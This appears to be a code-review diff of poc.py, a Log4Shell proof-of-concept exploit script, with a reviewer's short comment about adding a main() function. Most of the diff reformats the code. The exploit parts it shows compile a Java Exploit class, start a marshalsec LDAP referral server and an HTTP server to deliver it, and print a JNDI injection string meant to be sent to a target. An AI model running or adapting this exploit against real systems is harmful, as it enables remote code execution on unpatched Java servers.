poc.py

```diff
@@ -8,121 +8,135 @@
+    # writing the exploit to Exploit.java file
 
-  try:
-    Path("Exploit.java").write_text(genExploit)
-    subprocess.run(["./jdk1.8.0_20/bin/javac", "Exploit.java"])
-  except OSError as e:
-    print(Fore.RED + f'[-] Something went wrong {e}')
-    raise e
-  else:
-    print(Fore.GREEN + '[+] Exploit java class created success')
+    try:
+        Path("Exploit.java").write_text(genExploit)
+        subprocess.run(["./jdk1.8.0_20/bin/javac", "Exploit.java"])
+    except OSError as e:
+        print(Fore.RED + f'[-] Something went wrong {e}')
+        raise e
+    else:
+        print(Fore.GREEN + '[+] Exploit java class created success')
 
-def payload(userip , webport , lport):
-  genEvilCode(userip, lport)
 
-  print(Fore.GREEN + '[+] Setting up LDAP server\n')
+def payload(userip, webport, lport):
+    genEvilCode(userip, lport)
 
-  # create the LDAP server on new thread
-  t1 = threading.Thread(target=createLdapServer, args=(userip,webport))
-  t1.start()
+    print(Fore.GREEN + '[+] Setting up LDAP server\n')
 
-  # start the web server
-    
-  print(f"[+] Starting the Web server on port {webport} http://0.0.0.0:{webport}")
-  httpd = HTTPServer(('0.0.0.0', webport), SimpleHTTPRequestHandler)
-  httpd.serve_forever()
+    # create the LDAP server on new thread
+    t1 = threading.Thread(target=createLdapServer, args=(userip, webport))
+    t1.start()
 
+    # start the web server
 
+    print(f"[+] Starting Webserver on port {webport} http://0.0.0.0:{webport}")
+    httpd = HTTPServer(('0.0.0.0', webport), SimpleHTTPRequestHandler)
+    httpd.serve_forever()
 
-def checkJavaAvailible():
-  javaver = subprocess.call(['./jdk1.8.0_20/bin/java', '-version'], stderr=subprocess.DEVNULL, stdout=subprocess.DEVNULL)
-  if(javaver != 0):
-    print(Fore.RED + '[-] Java is not installed inside the repository ')
-    raise SystemExit(1)
-  
 
-def createLdapServer(userip, lport):
-  sendme = ("${jndi:ldap://%s:1389/a}") % (userip)
-  print(Fore.GREEN +"[+] Send me: "+sendme+"\n")
+def checkJavaAvailible():
+    javaver = subprocess.call([
+        './jdk1.8.0_20/bin/java',
+        '-version',
+    ], stderr=subprocess.DEVNULL, stdout=subprocess.DEVNULL)
+    if javaver != 0:
+        print(Fore.RED + '[-] Java is not installed inside the repository ')
+        raise SystemExit(1)
 
-  url = "http://{}:{}/#Exploit".format(userip, lport)
-  subprocess.run(["./jdk1.8.0_20/bin/java", "-cp",
-                 "target/marshalsec-0.0.3-SNAPSHOT-all.jar", "marshalsec.jndi.LDAPRefServer", url])
- 
 
-def header():
-  print(Fore.BLUE+"""
+def createLdapServer(userip, lport):
+    sendme = "${jndi:ldap://%s:1389/a}" % (userip)
+    print(Fore.GREEN + f"[+] Send me: {sendme}\n")
+
+    url = "http://{}:{}/#Exploit".format(userip, lport)
+    subprocess.run([
+        "./jdk1.8.0_20/bin/java",
+        "-cp",
+        "target/marshalsec-0.0.3-SNAPSHOT-all.jar",
+        "marshalsec.jndi.LDAPRefServer",
+        url,
+    ])
+
+
+def main():
```

Comment:
FYI, adding a `main()` funtion prevents variables like `parser` and `args` from being globals.